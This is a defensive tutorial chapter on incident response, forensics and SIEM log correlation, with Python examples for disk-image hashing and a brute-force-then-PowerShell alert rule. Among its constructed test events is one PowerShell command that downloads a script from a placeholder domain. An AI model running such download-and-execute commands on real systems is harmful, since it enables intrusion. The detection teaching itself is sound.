Chapter 12: Incident Response & Forensics


Pull up a chair—this is one of the most practical and high-stakes chapters in the entire tutorial. In January 2026 (right here in Airoli at around 4 PM IST, maybe with some evening traffic noise outside), incident response (IR) and digital forensics are not “nice-to-have” skills anymore—they are survival skills for organizations and increasingly for individuals in India.

Why?

  • CERT-In reported handling over 1.6 million cybersecurity incidents in 2025 alone (that’s ~4,400 per day on average).
  • Ransomware groups still hit Indian hospitals, manufacturing plants, and fintech startups weekly.
  • Under the DPDP Act 2023 (rules fully enforced since late 2025), organizations must detect, respond to, and report personal data breaches within tight timelines (often 72 hours or less), or face fines up to ₹250 crore.
  • Many companies in Navi Mumbai / Mumbai / Pune now have mandatory IR playbooks and tabletop exercises every quarter.

Today we’ll walk through the gold-standard framework most Indian CERTs, MSSPs, and large enterprises follow: the NIST SP 800-61r2 Incident Response Lifecycle (still the most widely adopted in 2026, with minor updates in NIST SP 800-61r3 draft floating around).

We’ll cover each phase in detail, then move to basic forensics, chain of custody, logs, and SIEM.

NIST Incident Response Lifecycle (5 Phases)

NIST SP 800-61r2 groups IR into four phases that loop continuously; this chapter splits the third phase into its three parts, which gives the five numbered phases walked through below:

  1. Preparation
  2. Detection & Analysis
  3. Containment, Eradication & Recovery (often split into three separate phases in practice, as done here)
  4. Post-Incident Activity (lessons learned – I’ll include it at the end)

Phase 1: Preparation (The Most Important Phase – Do It Before You Need It)

Goal: Build capability so you’re not starting from zero when the alert fires.

Key activities (2026 India context):

  • IR Plan / Playbook — Written document (not just a PDF gathering dust). Includes roles (Incident Coordinator, Technical Lead, Legal/Compliance, PR), escalation matrix, communication templates, evidence handling rules.
  • Team — CSIRT / SOC team (even if part-time), external retainers (e.g., Deloitte, EY, Kroll, or Indian firms like Lucideus/Quick Heal).
  • Tools & Infrastructure
    • Centralized logging (SIEM – Splunk, Elastic, Microsoft Sentinel, QRadar).
    • EDR/XDR (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint, Seqrite).
    • Forensic workstations (isolated, write-blockers, FTK/EnCase/Autopsy).
    • Backup & recovery tested (immutable/offline backups).
  • Training & Testing — Tabletop exercises, red-team simulations, phishing drills.
  • Legal/Regulatory Prep — DPDP breach notification templates, CERT-In Form I template ready.

Real example (Airoli SME): A small fintech has an IR playbook: “If ransomware detected → isolate affected VLAN via NGFW → notify CERT-In within 6 hours → engage external IR firm within 24 hours.”

Phase 2: Detection & Analysis

Goal: Find incidents early and understand scope/impact quickly.

Sources of detection (2026 common in India):

  • EDR alerts (process injection, encryption spike).
  • SIEM rules (brute-force login, anomalous outbound traffic to known C2).
  • User reports (“My files have .akira extension”).
  • External notification (CERT-In threat intel, dark-web mention).

Analysis steps:

  1. Triage: Is this real? Priority? (High = active ransomware, data exfil).
  2. Scope: Affected systems? Data? Users?
  3. Indicators: IOCs (IP, hash, file path, registry keys).
  4. Timeline: When did it start? (log correlation).

Example: SOC sees Defender alert → “rundll32.exe contacting 185.XX.XX.XX:443”. Analyst pulls logs → sees initial phishing email → credential theft → lateral movement via RDP → ransomware drop. Classifies as High severity ransomware incident.

Phase 3: Containment

Goal: Stop the bleeding – prevent further damage.

Two types:

  • Short-term containment (immediate): Isolate, kill processes, block C2 IPs/domains, disable compromised accounts.
  • Long-term containment (cleaner fix): Re-image systems, change all passwords, patch vulns.

Example actions (ransomware case):

  • Network: Block malicious IPs on firewall, isolate VLAN/subnet.
  • Endpoint: Quarantine via EDR, kill malicious processes.
  • Identity: Disable user accounts, force password reset + MFA re-enroll.
  • Backup: Verify offline backups are clean.

India tip: Many orgs now have “ransomware kill-switch” – one button to isolate entire segment via NGFW/SD-WAN.

Phase 4: Eradication

Goal: Remove the root cause and all traces of the attacker.

Steps:

  • Identify persistence mechanisms (scheduled tasks, registry run keys, WMI subscriptions, backdoors).
  • Wipe & rebuild affected systems (from trusted images).
  • Remove malware artifacts (use tools like Autoruns, Process Hacker).
  • Patch exploited vulnerabilities (e.g., RDP vuln, unpatched Exchange).
  • Rotate all credentials (especially privileged ones via PAM).

Example: Found scheduled task dropping payload every hour → delete task, re-image server, patch Log4Shell vuln that was entry point.

Phase 5: Recovery

Goal: Return to normal operations safely.

Steps:

  • Restore from clean backups (test first!).
  • Monitor closely for re-infection (increased logging, EDR tuning).
  • Communicate with stakeholders (customers, regulators).
  • Gradually bring systems online (phased rollout).

Example: Restore HR database from offline backup taken 2 days before attack → verify integrity → bring HR portal back online with extra monitoring for 30 days.

Post-Incident Activity (Lessons Learned)

  • Root cause analysis (RCA).
  • After-action report (what went well / gaps).
  • Update IR plan, tools, training.
  • Share IOCs with CERT-In / industry groups (anonymously if needed).

Basic Digital Forensics (Evidence Collection, Chain of Custody)

Digital Forensics = Science of preserving, identifying, extracting, and documenting digital evidence for court / internal use.

Core principles:

  • Preservation — Never work on original evidence (use forensic images).
  • Chain of Custody — Document every person who handled evidence, when, why (form with signatures, timestamps). Critical for admissibility in Indian courts (IT Act, Evidence Act).
  • Write-blockers — Hardware/software that prevents writes to source drive.

Basic collection steps (2026 toolkit):

  1. Volatile data first (RAM, running processes) – use Magnet RAM Capture, DumpIt, FTK Imager Lite.
  2. Create forensic image of disk (dd, FTK Imager, EnCase, Guymager).
  3. Hash verification (MD5/SHA-256 of image matches source).
  4. Timeline analysis (Autopsy, Plaso, Timesketch).
  5. File carving (recover deleted files – foremost, scalpel).

Example (Indian court case style): Ransomware hits company → IR team powers off affected server → uses write-blocker + FTK Imager to create .E01 image → documents chain of custody form → hands over to external forensics firm for court evidence.
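The acquisition and chain-of-custody steps above, as an added example that is not part of the original chapter and not any vendor's tool: it copies a source "drive" byte for byte, hashes source and image as the collection checklist requires, appends chain-of-custody records at acquisition and hand-off, and shows the hash check failing after a single altered byte. The source is a constructed temp file (a real acquisition reads through a write-blocker); the evidence ID and handler names are placeholders.

```python
# Added example (not the chapter's own code): image a source "drive",
# verify the image by SHA-256, and keep chain-of-custody records.
# The source is a constructed temp file; in a real acquisition the
# source sits behind a hardware write-blocker. Names are placeholders.
import hashlib
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1024 * 1024  # 1 MiB reads: large images never need to fit in RAM


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def acquire_image(source, image):
    """Copy source to image byte for byte, hashing the source as it is read.
    Returns (source_hash, image_hash); equal values prove a faithful copy."""
    h_src = hashlib.sha256()
    with open(source, "rb") as src, open(image, "wb") as dst:
        for chunk in iter(lambda: src.read(CHUNK), b""):
            h_src.update(chunk)
            dst.write(chunk)
    return h_src.hexdigest(), sha256_file(image)


def custody_entry(log, evidence_id, action, handler, sha256, note=""):
    """Append one chain-of-custody record: who did what to which item, when,
    and the hash observed at that moment. Returns the log for chaining."""
    log.append({
        "evidence_id": evidence_id,
        "action": action,
        "handler": handler,
        "timestamp_utc": datetime.now(timezone.utc).isoformat(),
        "sha256": sha256,
        "note": note,
    })
    return log


def verify_image(image, expected_sha256):
    """True only if the image still hashes to the value recorded at acquisition."""
    return sha256_file(image) == expected_sha256


def custody_is_consistent(log):
    """Every hand-off must carry the same hash as the acquisition record."""
    return all(entry["sha256"] == log[0]["sha256"] for entry in log)


def demo():
    """Run an acquisition, a hand-off, then a simulated alteration of the image."""
    with tempfile.TemporaryDirectory() as d:
        source = os.path.join(d, "sda.raw")   # constructed stand-in for /dev/sda
        image = os.path.join(d, "sda.dd")
        # deterministic content, odd size so the last read is a partial chunk
        with open(source, "wb") as f:
            f.write(bytes(range(256)) * (3 * CHUNK // 256) + b"tail-bytes")
        src_hash, img_hash = acquire_image(source, image)
        log = custody_entry([], "EV-2026-001", "acquired", "SOC analyst (placeholder)",
                            img_hash, "raw dd-style image")
        verified = src_hash == img_hash and verify_image(image, src_hash)
        # hand-off to the external firm: re-hash and record it
        custody_entry(log, "EV-2026-001", "handover",
                      "external forensics firm (placeholder)", sha256_file(image))
        clean_chain = custody_is_consistent(log)
        # simulate a single flipped byte; the hash check must now fail
        with open(image, "r+b") as f:
            first = f.read(1)
            f.seek(0)
            f.write(bytes([first[0] ^ 0xFF]))
        still_valid = verify_image(image, src_hash)
        return verified, clean_chain, still_valid, log


if __name__ == "__main__":
    print(demo()[:3])  # (True, True, False)
```

The hash is computed while the source is read, so the acquisition record holds the value observed at collection time rather than one recomputed later; each later custody entry re-hashes the item, which is what lets a court or an internal reviewer see exactly where a mismatch first appeared.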

Log Analysis and SIEM Introduction

Logs = The truth serum of incidents.

Key log sources (2026):

  • Windows Event Logs (Security, System, Application).
  • Sysmon (advanced process/network logging).
  • Endpoint (EDR telemetry).
  • Network (firewall, DNS, proxy, IDS/IPS).
  • Cloud (Azure AD sign-ins, AWS CloudTrail).
  • Application (web server, database audit logs).

SIEM (Security Information & Event Management) — Central platform that collects, normalizes, correlates, alerts, and reports on logs.

Popular in India 2026:

  • Microsoft Sentinel (cloud, affordable for many).
  • Elastic (ELK) Stack (open-source, very common in startups).
  • Splunk (enterprise gold standard).
  • QRadar, Sumo Logic, Seqrite, ManageEngine.

Example workflow: SIEM rule: “Multiple failed logins from same IP followed by successful login + process creation of powershell.exe downloading from suspicious domain” → alerts SOC → analyst correlates with Sysmon logs → confirms credential theft + Cobalt Strike beacon → escalates to IR.
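The SIEM rule in the workflow above, together with the triage/scope/IOC/timeline steps from Phase 2, as an added example that is not the chapter's own code and is not written in any SIEM vendor's rule language: a plain-Python correlation over constructed, already-normalised records in the shape a SIEM holds after parsing Windows Security (4625/4624) and Sysmon (EventID 1) events. It fires only when the three stages chain on one host within a time window, and the alert it returns carries the IOCs and timeline an analyst needs for triage. Hosts, users, the IP 203.0.113.45 (documentation range) and the domain cdn-update.example are constructed placeholders.

```python
# Added example (not the chapter's code, and not any SIEM vendor's rule
# language): the chapter's correlation rule implemented in plain Python
# and run over constructed, already-normalised records in the shape a
# SIEM would hold after parsing Windows Security and Sysmon events.
# Hosts, users, the IP 203.0.113.45 (documentation range) and the domain
# cdn-update.example are all constructed placeholders.
import re
from collections import defaultdict
from datetime import datetime, timedelta

POWERSHELL = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# 5 failed RDP logons from one IP, then a success, then PowerShell fetching a URL
EVENTS = [
    {"ts": f"2026-01-14T10:01:{s:02d}", "source": "security", "event_id": 4625,
     "host": "FIN-WS07", "user": "priya.s", "src_ip": "203.0.113.45"}
    for s in (2, 10, 18, 27, 40)
] + [
    {"ts": "2026-01-14T10:02:10", "source": "security", "event_id": 4624,
     "host": "FIN-WS07", "user": "priya.s", "src_ip": "203.0.113.45", "logon_type": 10},
    {"ts": "2026-01-14T10:03:05", "source": "sysmon", "event_id": 1,
     "host": "FIN-WS07", "user": "priya.s", "image": POWERSHELL,
     "cmdline": 'powershell.exe -c "Invoke-WebRequest http://cdn-update.example/update.ps1"'},
    # benign noise on another host: interactive logon, harmless PowerShell
    {"ts": "2026-01-14T10:03:30", "source": "security", "event_id": 4624,
     "host": "HR-WS02", "user": "amit.k", "src_ip": "10.0.5.12", "logon_type": 2},
    {"ts": "2026-01-14T10:04:00", "source": "sysmon", "event_id": 1,
     "host": "HR-WS02", "user": "amit.k", "image": POWERSHELL,
     "cmdline": "powershell.exe -c Get-Date"},
]

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def correlate(events, min_failures=5, window=timedelta(minutes=10)):
    """Three-stage rule: >= min_failures 4625s from one IP inside `window`,
    then a 4624 from that IP, then Sysmon EventID 1 for powershell.exe on the
    logged-on host with a URL in the command line. Returns one alert per
    chain with the IOCs and timeline the analyst needs for triage."""
    events = sorted(events, key=_ts)
    failures = defaultdict(list)          # src_ip -> timestamps of 4625s
    alerts = []
    for e in events:
        if e["source"] != "security":
            continue
        t = _ts(e)
        if e["event_id"] == 4625:
            failures[e["src_ip"]].append(t)
            continue
        if e["event_id"] != 4624:
            continue
        recent = [f for f in failures[e["src_ip"]] if t - f <= window]
        if len(recent) < min_failures:
            continue
        # stages 1 and 2 satisfied; look for stage 3 on the same host in the window
        for p in events:
            if p["source"] != "sysmon" or p["event_id"] != 1 or p["host"] != e["host"]:
                continue
            pt = _ts(p)
            if not (t <= pt <= t + window) or not p["image"].lower().endswith("powershell.exe"):
                continue
            m = URL_RE.search(p["cmdline"])
            if not m:
                continue
            alerts.append({
                "severity": "High",
                "host": e["host"], "user": e["user"],
                "src_ip": e["src_ip"], "domain": m.group(1),
                "failed_logons": len(recent),
                "timeline": [
                    (recent[0].isoformat(), "first failed logon"),
                    (t.isoformat(), "successful logon after failures"),
                    (pt.isoformat(), "powershell.exe fetched URL"),
                ],
            })
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a["severity"], a["host"], a["src_ip"], a["domain"])
        for when, what in a["timeline"]:
            print("  ", when, what)
```

The benign records on HR-WS02 never fire because no failed logons precede them, which is the point of chaining stages rather than alerting on powershell.exe alone; the `min_failures` and `window` parameters are the two knobs a SOC tunes when the rule is too noisy or too quiet in its own environment.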

That’s Chapter 12 in full detail—real-world, actionable, India-relevant.
